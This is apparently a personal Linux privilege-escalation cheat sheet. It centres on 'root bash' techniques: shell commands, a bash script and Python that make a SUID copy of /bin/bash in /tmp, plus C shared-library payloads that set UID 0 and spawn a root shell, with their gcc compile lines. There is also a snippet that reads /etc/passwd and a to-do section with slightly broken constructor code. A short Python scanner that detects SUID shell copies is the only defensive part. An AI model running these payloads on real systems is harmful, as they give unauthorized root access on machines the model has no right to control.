Root Bash
A root bash is a (bash) shell that was executed as root. For instance, using an attack vector such as a SUID script, we may run:
$ cp /bin/bash /tmp/rootbash
$ chown root /tmp/rootbash
$ chmod +s /tmp/rootbash
If you are successful, you can use -p (and -i) to run it:
$ /tmp/rootbash -p
root@xxx$
Replace root with another user according to the attack vector.
Root Bash (script)
Remember to make it executable using chmod +x root.sh.
#!/usr/bin/env /bin/bash
cp /bin/bash /tmp/rootbash
chown root /tmp/rootbash
chmod +s /tmp/rootbash
Root Bash (Python)
The values 0,0 are the UID/GID. 0o4755 means 755 with SUID.
import shutil
import os
source_path = '/bin/bash'
destination_path = '/tmp/rootbash'
shutil.copy2(source_path, destination_path)
os.chown(destination_path, 0, 0)
os.chmod(destination_path, 0o4755)
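Every variant above leaves the same artifact on disk: a SUID copy of a shell in a world-writable directory. The following is an added example (not from the original page) that reports SUID/SGID files and flags those whose content matches a known shell; the function names, scan directories and reference shell list are assumptions.

```python
import hashlib
import os
import stat


def sha256_of(path):
    """Hash a file in chunks so large binaries are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_suid_shell_copies(scan_dirs, reference_shells):
    """Return (path, owner uid, octal mode, matched shell or None) per SUID/SGID file."""
    known = {}
    for shell in reference_shells:
        try:
            known[sha256_of(shell)] = shell
        except OSError:
            continue  # reference shell not present on this host
    findings = []
    for top in scan_dirs:
        for root, _dirs, files in os.walk(top):
            for name in files:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)  # lstat: do not follow symlinks
                except OSError:
                    continue  # file vanished during the walk
                is_set_id = st.st_mode & (stat.S_ISUID | stat.S_ISGID)
                if not stat.S_ISREG(st.st_mode) or not is_set_id:
                    continue
                try:
                    # Content match catches copies renamed to hide them.
                    match = known.get(sha256_of(path))
                except OSError:
                    match = None  # unreadable, still report the SUID bit
                mode = oct(stat.S_IMODE(st.st_mode))
                findings.append((path, st.st_uid, mode, match))
    return findings


if __name__ == "__main__":
    # Assumed scan roots and reference shells; adjust per host.
    dirs = ["/tmp", "/var/tmp", "/dev/shm"]
    for finding in find_suid_shell_copies(dirs, ["/bin/bash", "/bin/sh"]):
        print(finding)
```

Any SUID or SGID file in these directories deserves a look; a non-None fourth field means the file is byte-identical to one of the reference shells.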
Root Bash Static Library
Short simplified program.
#include <stdlib.h>  // system
#include <unistd.h>  // setgid, setuid

void _init() {
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Long program.
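#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>  // unsetenv, system
#include <unistd.h>  // setgid, setuid

void _init() {
    // Clear LD_PRELOAD so child processes do not load this library again.
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}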
To compile, use:
$ gcc -shared -fPIC init.c -o init.so
Or, if you are compiling the function _init:
$ gcc -shared -fPIC init.c -o init.so -nostartfiles
⚠️ Remember to ensure that the file is readable by those that need it.
$ chmod 777 init.so # avoid it
Read a file in C
#include <stdio.h>

// Print the contents of /etc/passwd line by line.
void read_file(void) {
    FILE *file = fopen("/etc/passwd", "r");
    if (file == NULL) {
        printf("Error opening the file.\n");
        return;
    }
    char buffer[256];
    while (fgets(buffer, sizeof(buffer), file) != NULL) {
        printf("%s", buffer);
    }
    fclose(file);
}
To-do
Stuff that I found but have not read/used yet.
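// gcc -shared -fPIC shell.c -o shell.so
#include <stdio.h>
#include <stdlib.h>

// Constructor: runs automatically when the library is loaded.
void __attribute__((constructor)) shell();
void main() {};

void shell() {
    system("id");
}

// Alternative spelling of the same attribute (use one form, not both):
__attribute__ ((__constructor__)) void shell() {
    // ...
}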